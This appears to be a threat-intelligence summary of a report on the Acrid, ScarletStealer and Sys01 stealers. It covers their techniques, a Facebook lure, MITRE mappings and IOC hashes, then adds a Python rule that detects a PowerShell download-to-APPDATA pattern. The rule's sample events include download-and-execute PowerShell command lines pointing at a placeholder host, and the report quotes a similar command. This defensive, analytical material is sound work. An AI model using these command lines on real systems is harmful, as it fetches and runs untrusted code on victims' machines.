Stealers, stealers and more stealers

Stealers—Acrid, ScarletStealer and Sys01—are examined with notes on their evolution, capabilities and distribution. The report highlights techniques such as Heaven’s Gate for 32-bit apps to access 64-bit space, a Facebook-based ZIP lure, and multi-stage payload chains used to steal browser data and crypto wallets. #Acrid #ScarletStealer #Sys01 #Penguish #HeavensGate #Facebook #Algeria #Brazil #Turkey #Indonesia

Keypoints

  • Acrid is a new stealer using the 32-bit Heaven’s Gate technique to access 64-bit space, enabling bypass of some security controls.
  • ScarletStealer is unusual in that most of its stealing functionality lives in other binaries that it downloads, including digitally signed executables.
  • The ScarletStealer download chain includes binaries like metaver_.exe and meta.exe, with most binaries digitally signed.
  • Sys01 (Album Stealer) evolved from a C# stealer to a PHP/C# hybrid payload, using a multi-stage infection chain delivered via ZIP archives.
  • Infection vectors rely on convincing social-engineering via Facebook pages, distributing malicious ZIPs disguised as adult content.
  • Victims are spread globally, with Algeria accounting for a notable share of infections; the actors favor .top domains in their infrastructure.

MITRE Techniques

  • [T1041] Exfiltration Over C2 Channel – Collected data is zipped and sent to the C2. “Collected data is zipped and sent to the C2.”
  • [T1059.001] PowerShell – ScarletStealer uses PowerShell to download and execute additional payloads. "powershell.exe -Command "Invoke-WebRequest -Uri 'https://………exe' -OutFile $env:APPDATA………exe""
  • [T1105] Ingress Tool Transfer – The downloader workflow includes downloading additional executables via PowerShell. “download the additional executables using the following PowerShell command:”
  • [T1574.002] Hijack Execution Flow: DLL Side-loading – Sys01 sideloads a malicious DLL (WDSync.dll) via a legitimate binary. “the archive contains a legitimate binary — in this case WdSyncservice.exe, renamed to PlayVideoFull.exe — that sideloads a malicious DLL named WDSync.dll.”
  • [T1555.003] Credentials from Web Browsers – Stealer functionality includes stealing browser data (cookies, passwords, login data, credit card information, etc.). “Stealing browser data (cookies, passwords, login data, credit card information, etc.).”
  • [T1566.001] Phishing: Spearphishing Attachment – Infection vector relies on a malicious ZIP archive disguised as an adult video via a Facebook page. “Users are still tricked into downloading a malicious ZIP archive disguised as an adult video via a Facebook page”
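The T1059.001 and T1105 entries above describe the same downloader pattern: PowerShell fetches an executable with Invoke-WebRequest and writes it under %APPDATA%. The following is an added detection example, not code from the report or from Securelist; it runs a small rule over constructed process-creation events (the command lines, host names and URLs are made up for illustration) and flags the ones that combine a download cmdlet with an -OutFile target in $env:APPDATA.

```python
import re

# Constructed sample process-creation events: (image name, command line).
# None of these are taken from the report; they only mimic the shape of the quoted command.
SAMPLE_EVENTS = [
    ("powershell.exe",
     "powershell.exe -Command \"Invoke-WebRequest -Uri 'https://example.invalid/a.exe' "
     "-OutFile $env:APPDATA\\a.exe\""),
    ("powershell.exe", "powershell.exe -Command Get-ChildItem C:\\Users"),
    ("cmd.exe", "cmd.exe /c dir"),
    ("pwsh.exe",
     "pwsh.exe -c \"iwr https://example.invalid/b.exe -OutFile $env:APPDATA\\b.exe; "
     "Start-Process $env:APPDATA\\b.exe\""),
]

# Download cmdlets and their common aliases (curl/wget are aliases of Invoke-WebRequest in Windows PowerShell).
DOWNLOAD_CMDLETS = re.compile(r"\b(Invoke-WebRequest|iwr|wget|curl|Start-BitsTransfer)\b", re.I)
# The downloaded file is written somewhere under %APPDATA%, as in the quoted ScarletStealer command.
OUTFILE_TO_APPDATA = re.compile(r"-OutFile\s+\$env:APPDATA", re.I)
# Optional stronger signal: the dropped file is launched in the same command line.
EXECUTES_FROM_APPDATA = re.compile(r"Start-Process\s+\$env:APPDATA", re.I)

POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}


def score_event(image, cmdline):
    """Return the list of indicator names matched by one process-creation event."""
    hits = []
    if image.lower() not in POWERSHELL_IMAGES:
        return hits
    if DOWNLOAD_CMDLETS.search(cmdline):
        hits.append("download_cmdlet")
    if OUTFILE_TO_APPDATA.search(cmdline):
        hits.append("outfile_appdata")
    if EXECUTES_FROM_APPDATA.search(cmdline):
        hits.append("executes_from_appdata")
    return hits


def find_suspicious(events):
    """Flag events that both download a file and save it under %APPDATA%.

    Returns a list of (command line, matched indicators). Requiring both indicators
    keeps ordinary Invoke-WebRequest usage (e.g. API calls) from firing the rule.
    """
    flagged = []
    for image, cmdline in events:
        hits = score_event(image, cmdline)
        if "download_cmdlet" in hits and "outfile_appdata" in hits:
            flagged.append((cmdline, hits))
    return flagged


if __name__ == "__main__":
    for cmdline, hits in find_suspicious(SAMPLE_EVENTS):
        print(", ".join(hits), "->", cmdline)
```

The rule is deliberately narrow: it keys on the download-plus-drop-location combination that the quoted command shows, so in a real pipeline it would be fed from a process-creation source (Sysmon Event ID 1 or Security 4688 with command-line auditing) and tuned to the environment's own legitimate scripts.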

Indicators of Compromise

  • [Hash] Acrid IOCs – abceb35cf20f22fd8a6569a876e702cb, 2b71c81c48625099b18922ff7bebbf51 and 1 more hash
  • [Hash] ScarletStealer IOCs – 1d3c3869d682fbd0ae3151b419984771, c0cf3d6d40a3038966f2a4f5bfe2b7a7 and 1 more hash
  • [Hash] Sys01 IOCs – 0x6e2b16cc41de627eb7ddcd468a037761, 0x21df3a69540c6618cfbdaf84fc71031c and 1 more hash

Read more: https://securelist.com/crimeware-report-stealers/112633/